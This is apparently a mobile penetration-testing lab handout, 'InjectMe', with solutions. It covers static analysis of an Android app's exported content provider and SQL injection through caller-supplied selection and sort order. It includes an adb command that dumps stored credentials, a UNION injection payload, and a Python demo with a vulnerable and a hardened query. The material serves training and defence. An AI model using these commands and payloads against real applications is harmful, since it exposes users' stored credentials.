MASPTv2.5 InjectMe

The document discusses performing static code analysis on a mobile application's source code to identify potential SQL injection vulnerabilities. It provides tasks to install the application, extract application information from the manifest, enumerate content URIs, examine the source code for injection points, and exploit a vulnerability.

Static Code Analysis

InjectMe LAB

LAB Topics
Static Code Analysis

© Caendra Inc. 2017 | MASPTv2.5 | Static Code Analysis 1


SCENARIO
Before your company’s new mobile application makes it into production, the mobile security
manager tasked you with performing static code analysis against the application’s source
code. The purpose is to make sure there are no SQL-injection vulnerabilities, since the
application stores user credentials.

You are allowed to use all the tools in your toolkit to extract critical application information.
The objective is to find any critical injection vulnerabilities that may exist, so that it is safe
for the company’s clients to use the new application.

LAB OBJECTIVES
The objective of this lab is to highlight the importance of static code analysis while
performing a mobile application penetration test. A large amount of critical information can
be extracted through performing static code analysis on the application’s source code such
as unprotected application components, implicitly exported activities, insufficiently secure
local databases, etc. This information can be used to perform more elaborate attacks against
the application.

LEARNING OBJECTIVES
The learning objective of this lab is to provide hands-on experience in performing static code
analysis against an application’s source code in order to identify possible SQL-injection
vulnerabilities.



RECOMMENDED TOOLS
• Android Studio
• “Strings” binary

RECOMMENDED CONFIGURATION
Setting up your testing environment for this lab

There can be different configurations to accommodate this lab’s testing environment. We
used the following configuration:

1. Windows 10 machine running:
   • Android Studio 2.2.3
   • Java version 1.8

2. Preferred device:
   • Android device running API level 23

TASKS
TASK 1. INSTALLATION OF APK AND REVIEW OF THE
APPLICATION’S FUNCTIONALITY
Please install this application on your device (physical or virtual); if you run into any issues,
use the solution section. Then go through the application’s functionality.



TASK 2. EXTRACT CRITICAL APPLICATION INFORMATION
As always, to start your analysis try to understand as much as possible about the
application’s attack surface from its manifest file.

TASK 3. ENUMERATE ALL THE POSSIBLE CONTENT URIs IN
THE APPLICATION
If you haven’t already discovered a possible vulnerability by inspecting the application’s
manifest file, we recommend taking a closer look at the application’s content provider. When
dealing with content providers you will have to enumerate all possible content URIs in the
application.

TASK 4. EXAMINE THE SOURCE CODE
Examine the source code based on the possible injection points you identified in Tasks 2 and
3, to validate any SQL-injection vulnerabilities.

TASK 5. EXPLOIT THE VULNERABILITY YOU IDENTIFIED


Now it is time to create some evidence to prove the vulnerability you just discovered through
static code analysis. You can do this by interacting with the vulnerable application
component and extracting sensitive information.



SOLUTIONS



TASK 1. INSTALLATION OF APK AND REVIEW OF THE
APPLICATION’S FUNCTIONALITY
Just like in the previous labs, to install InjectMe on your device, you can either generate a
signed APK using Android Studio and the application’s project folder or find a prebuilt APK
in the following path.

your_drive:\extracted_zip_path\InjectMe\app\build\outputs\apk

Then, you can install InjectMe on your device through an adb install command.

Now, open InjectMe in your device and go through its functionality.

You can see that you can create and store credentials using the application.

Create the following sets of credentials.

Name     Password
admin1   admin123
admin2   admin234

TASK 2. EXTRACT CRITICAL APPLICATION INFORMATION


Since you were supplied with the full project folder, you can explore the actual source code
written by the developer(s).

Looking at the application’s AndroidManifest.xml file, you can see that it declares a content
provider which is insecure when the application runs on a device with an API level between
8 and 23.

The content provider is insecure because it is implicitly exported: it carries no
android:exported attribute, and a provider without that attribute is exported by default when
the application’s minSdkVersion or targetSdkVersion is 16 or lower. It is therefore reachable
by any third-party application, with no permission required. Declaring
android:exported="false" explicitly, or guarding the provider with a permission, removes
that exposure.



TASK 3. ENUMERATE ALL THE POSSIBLE CONTENT URI IN
THE APPLICATION
An easy way to enumerate all possible content URIs inside an application is to extract the
classes.dex file from the built APK and search within it for the content:// scheme.

To extract the classes.dex file from the built APK, you can simply rename the APK to a
.zip/.7z/.rar file and extract its contents (an APK is an ordinary ZIP archive).

Then use the strings binary for Windows against classes.dex and filter its output for
content:// to list every content URI literal the application contains. Keep in mind that this
only finds URIs stored as complete string literals; a URI assembled at runtime from an
authority and a path segment shows up as separate fragments, so cross-check the results
against the android:authorities values in the manifest and, if the provider uses one, the
UriMatcher.addURI() calls in the source.

The strings binary for Windows can be downloaded from the link below.

https://technet.microsoft.com/en-us/sysinternals/strings.aspx
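The same enumeration in Python, as an added example that is not part of the lab files or of InjectMe: it reproduces what a strings pass filtered for content:// does, over a constructed byte blob that stands in for classes.dex (the authority com.example.app.provider and its paths are assumed for illustration). Pass a real classes.dex path on the command line to scan the extracted file instead.

```python
"""Enumerate content:// URIs in a classes.dex the way strings | findstr would."""
import re
import sys

# Constructed sample standing in for classes.dex: a DEX-like header, a few
# string items separated by binary junk, one URI repeated, one UriMatcher-style
# pattern ending in '#', and a hard-coded SQL fragment. Authority and paths are
# assumed for illustration, not taken from InjectMe.
SAMPLE_DEX = (
    b"dex\n035\x00" + b"\x00" * 16
    + b"content://com.example.app.provider/credentials\x00"
    + b"\x01\x02\x03\xff"
    + b"Lcom/example/app/CredentialProvider;\x00"
    + b"content://com.example.app.provider/credentials/#\x00"
    + b"\x7f\x80\x81"
    + b"content://com.example.app.provider/credentials\x00"
    + b"SELECT * FROM credentials WHERE \x00"
)

# A content URI literal: scheme, authority, optional path up to whitespace.
CONTENT_URI = re.compile(r"content://[A-Za-z0-9_.\-]+(?:/\S*)?")


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Printable-ASCII runs of at least min_len bytes, in file order: the same
    heuristic the strings binary applies (4 is its default minimum)."""
    runs = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in runs.finditer(blob)]


def find_content_uris(blob: bytes) -> list:
    """Distinct content:// URIs found among the blob's strings, sorted."""
    found = set()
    for s in extract_strings(blob):
        found.update(CONTENT_URI.findall(s))
    return sorted(found)


def authorities(uris) -> list:
    """Distinct provider authorities, to cross-check against the
    android:authorities values declared in AndroidManifest.xml."""
    return sorted({u[len("content://"):].split("/", 1)[0] for u in uris})


if __name__ == "__main__":
    # python find_content_uris.py path\to\classes.dex  (no argument: scan the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DEX
    uris = find_content_uris(data)
    print("authorities:", ", ".join(authorities(uris)))
    for uri in uris:
        print(uri)
```

The trailing `#` in one of the sample URIs is the UriMatcher wildcard for a numeric ID; seeing such patterns in the string table tells you which path shapes the provider's switch statement is prepared to accept, which is exactly the list of entry points to read next in the source.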

TASK 4. EXAMINE THE SOURCE CODE


Now that you have identified a possible injection point, continue exploring the source code
using Android Studio. An interesting next step is inspecting the ContentProvider subclass.
There you can see the query() method, which receives a content URI (together with the
caller’s projection, selection, selection arguments and sort order) and returns a Cursor (a list
of results).



Then examine the source code for any other “query” (retrieve) methods. You will not find
any, so every retrieval query passes through the method above.

Walking through the query() method from the top, the first conditional you encounter is a
switch statement on the matched URI. As long as the URI is valid, it matches one of the two
cases and the input derived from the URI is taken into the query.



Next, the sort order is determined and the final database query method is called.

As with any static code analysis activity, be thorough. Check whether there is a
parameterized query or any sanitization of the input beyond the qualification performed by
the switch statement, since those could mitigate an injection vulnerability. Here there are
none, but in general pay attention and do not jump to quick conclusions. In particular, note
that SQLiteDatabase.query() appends the selection and sortOrder strings to the SQL verbatim;
only values passed through selectionArgs are bound as parameters, so a provider that
forwards a caller’s selection or sortOrder unchanged is injectable even if its own SQL is
otherwise fixed.

TASK 5. EXPLOIT THE VULNERABILITY YOU IDENTIFIED


You already identified that any third-party application can communicate with the
application’s content provider.

You can interact with the insecure content provider you discovered in Task 2, either by
creating a malicious exploit application or by using ADB. In this tutorial, we will describe the
latter.

To interact with the insecure content provider, execute the following command through
ADB:

adb.exe shell content query --uri content://com.elearnsecurity.injectme.provider.CredentialProvider/credentials

You should see the rows for the credentials you created in Task 1 returned by the provider.

On your own: what other SQL can you run here? Can you insert or delete? (The content tool
also accepts --where and --sort for query, and has insert, update and delete subcommands.)
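To make the Task 4 finding and the Task 5 exploit concrete, here is an added example that is not InjectMe's own code: a Python model, on an in-memory SQLite database, of a query() method shaped like the one described above (switch on the URI to pick a table, then hand the caller's selection and sort order to the database query unchanged), next to a parameterized version. The table and column names, the `credentials` path segment and the sort whitelist are assumed for illustration; the two rows are the ones created in Task 1.

```python
"""Caller-controlled selection/sortOrder as an injection sink, and the fix."""
import sqlite3

# UriMatcher stand-in: the last path segment of an accepted URI maps to a table
# (assumed names; the real provider's switch statement plays this role).
TABLE_FOR_PATH = {"credentials": "credentials"}
# Columns a caller may sort by; anything else is rejected in the hardened form.
SORTABLE_COLUMNS = {"_id", "name", "password"}


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database holding the two credential rows from Task 1."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE credentials (_id INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO credentials (name, password) VALUES (?, ?)",
        [("admin1", "admin123"), ("admin2", "admin234")],
    )
    conn.commit()
    return conn


def vulnerable_query(conn, path_segment, selection=None, sort_order=None):
    """Mirrors the lab's pattern: switch on the URI, then concatenate the
    caller-supplied selection and sortOrder into the statement, which is what
    SQLiteDatabase.query(table, ..., selection, null, ..., sortOrder) does."""
    table = TABLE_FOR_PATH[path_segment]  # KeyError plays the switch's default case
    sql = f"SELECT * FROM {table}"
    if selection:
        sql += f" WHERE {selection}"      # raw SQL fragment from the caller (--where)
    if sort_order:
        sql += f" ORDER BY {sort_order}"  # also raw (--sort)
    return conn.execute(sql).fetchall()


def hardened_query(conn, path_segment, name=None, sort_order=None):
    """Same table lookup, but the filter value is bound with ? and the sort
    order is checked against a whitelist of column names before use."""
    table = TABLE_FOR_PATH[path_segment]
    sql = f"SELECT _id, name, password FROM {table}"
    params = []
    if name is not None:
        sql += " WHERE name = ?"
        params.append(name)
    if sort_order is not None:
        column, _, direction = sort_order.strip().partition(" ")
        if column not in SORTABLE_COLUMNS or direction.upper() not in ("", "ASC", "DESC"):
            raise ValueError(f"rejected sort order: {sort_order!r}")
        sql += f" ORDER BY {column} {direction}".rstrip()
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = build_db()
    # 1. Exported provider, no selection: the adb content query from Task 5.
    print(vulnerable_query(db, "credentials"))
    # 2. Injected selection (what --where would carry): UNION the schema out of sqlite_master.
    payload = "1=0 UNION SELECT 1, name, sql FROM sqlite_master"
    print(vulnerable_query(db, "credentials", selection=payload))
    # 3. Hardened: the same payload is just a name value that matches nothing.
    print(hardened_query(db, "credentials", name=payload))
```

Run it and the second print shows the `CREATE TABLE` statement pulled from `sqlite_master` through the credentials URI, which is the static-analysis conclusion from Task 4 turned into evidence; the third shows the same string bound as a parameter and returning no rows. The sort order is a second sink of the same kind, so the hardened version whitelists it rather than trying to escape it.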

